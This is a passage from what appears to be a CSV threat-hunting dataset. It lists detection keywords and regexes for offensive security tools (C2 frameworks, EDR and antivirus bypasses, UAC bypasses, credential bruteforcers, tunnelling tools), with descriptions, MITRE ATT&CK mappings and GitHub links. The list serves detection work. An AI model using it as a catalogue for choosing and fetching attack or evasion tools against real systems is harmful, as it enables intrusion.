Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*/tunnel.tomcat.5.jsp*",".{0,1000}\/tunnel\.tomcat\.5\.jsp.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*/tunnel-socks5.py*",".{0,1000}\/tunnel\-socks5\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/TunnelVision.git*",".{0,1000}\/TunnelVision\.git.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","9","7","N/A","N/A","N/A","N/A" "*/TunnelVisionVM.ova*",".{0,1000}\/TunnelVisionVM\.ova.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","9","7","N/A","N/A","N/A","N/A" "*/turbo-intruder-all.jar*",".{0,1000}\/turbo\-intruder\-all\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*/tweetshell.sh*",".{0,1000}\/tweetshell\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "*/twittor.git*",".{0,1000}\/twittor\.git.{0,1000}","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","752","216","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" "*/uac.py*",".{0,1000}\/uac\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/UACBypass.dll*",".{0,1000}\/UACBypass\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/UACBypasses/*",".{0,1000}\/UACBypasses\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/UACME.git*",".{0,1000}\/UACME\.git.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5924","1287","2024-04-17T00:56:06Z","2015-03-28T12:04:33Z" "*/UAC-SilentClean/*",".{0,1000}\/UAC\-SilentClean\/.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*/UAC-TokenMagic.ps1*",".{0,1000}\/UAC\-TokenMagic\.ps1.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*/uberfile.py*",".{0,1000}\/uberfile\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/ubiquiti-discovery.nse*",".{0,1000}\/ubiquiti\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/udmp-parser.git*",".{0,1000}\/udmp\-parser\.git.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","172","24","2024-02-25T13:18:10Z","2022-01-30T18:56:21Z" "*/UefiShell.iso*",".{0,1000}\/UefiShell\.iso.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*/umeshshinde19/instainsane*",".{0,1000}\/umeshshinde19\/instainsane.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","7","6","519","335","2024-02-11T10:29:05Z","2018-12-02T22:48:11Z" "*/unDefender.exe*",".{0,1000}\/unDefender\.exe.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","321","77","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*/unDefender.git*",".{0,1000}\/unDefender\.git.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","321","77","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*/undertheradar.git*",".{0,1000}\/undertheradar\.git.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*/unhook-bof*",".{0,1000}\/unhook\-bof.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*/unhook-bof*",".{0,1000}\/unhook\-bof.{0,1000}","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/unhook-bof","1","1","N/A","10","10","50","14","2022-03-13T15:57:10Z","2021-07-02T14:55:38Z" "*/unhook-bof*",".{0,1000}\/unhook\-bof.{0,1000}","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/unhook-bof","1","1","N/A","10","10","256","57","2021-09-18T18:12:41Z","2021-01-13T02:20:44Z" "*/UnhookingPatch.git*",".{0,1000}\/UnhookingPatch\.git.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","1","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*/UnhookingPatch.git*",".{0,1000}\/UnhookingPatch\.git.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*/unicorn.git*",".{0,1000}\/unicorn\.git.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*/unicorn.py*",".{0,1000}\/unicorn\.py.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*/unittest.nse*",".{0,1000}\/unittest\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/UnlinkDLL.git*",".{0,1000}\/UnlinkDLL\.git.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","7","1","54","11","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z" "*/UnmanagedPowerShell.git*",".{0,1000}\/UnmanagedPowerShell\.git.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","1","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*/unshackle.git*",".{0,1000}\/unshackle\.git.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1686","100","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z" "*/unshackle.modules*",".{0,1000}\/unshackle\.modules.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1686","100","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z" "*/unstable/net/iodine*",".{0,1000}\/unstable\/net\/iodine.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*/unused/locktest.sh*",".{0,1000}\/unused\/locktest\.sh.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/unused/Yosemite.patch*",".{0,1000}\/unused\/Yosemite\.patch.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/unusual-port.nse*",".{0,1000}\/unusual\-port\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/upnp-info.nse*",".{0,1000}\/upnp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/uptime-agent-info.nse*",".{0,1000}\/uptime\-agent\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/url-snarf.nse*",".{0,1000}\/url\-snarf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/user_data/*/keylog.txt*",".{0,1000}\/user_data\/.{0,1000}\/keylog\.txt.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*/user_persistence_run.c*",".{0,1000}\/user_persistence_run\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*/userenum.go*",".{0,1000}\/userenum\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*/userenum.go*",".{0,1000}\/userenum\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*/UserlandBypass/*.c*",".{0,1000}\/UserlandBypass\/.{0,1000}\.c.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*/username-anarchy*",".{0,1000}\/username\-anarchy.{0,1000}","offensive_tool_keyword","username-anarchy","Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.","T1110 - T1134 - T1078","TA0006","N/A","N/A","Credential Access","https://github.com/urbanadventurer/username-anarchy","1","1","N/A","N/A","7","680","120","2024-02-28T16:57:48Z","2012-11-07T05:35:10Z" "*/UserNamespaceOverlayfsSetuidWriteExec/*",".{0,1000}\/UserNamespaceOverlayfsSetuidWriteExec\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/Use-Waitfor.exe*",".{0,1000}\/Use\-Waitfor\.exe.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*/usniper.py*",".{0,1000}\/usniper\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/usr/bin/legba*",".{0,1000}\/usr\/bin\/legba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*/usr/bin/merlinAgent*",".{0,1000}\/usr\/bin\/merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/usr/bin/pkexec*",".{0,1000}\/usr\/bin\/pkexec.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","1","N/A","N/A","1","96","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" "*/usr/bin/polenum*",".{0,1000}\/usr\/bin\/polenum.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*/usr/local/bin/exegol*",".{0,1000}\/usr\/local\/bin\/exegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/usr/local/bin/nullinux*",".{0,1000}\/usr\/local\/bin\/nullinux.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*/usr/local/bin/reverst*",".{0,1000}\/usr\/local\/bin\/reverst.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*/usr/local/pwndrop/*",".{0,1000}\/usr\/local\/pwndrop\/.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*/usr/sbin/tor*",".{0,1000}\/usr\/sbin\/tor.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/usr/share/brutespray*",".{0,1000}\/usr\/share\/brutespray.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*/usr/share/cobaltstrike/*",".{0,1000}\/usr\/share\/cobaltstrike\/.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for 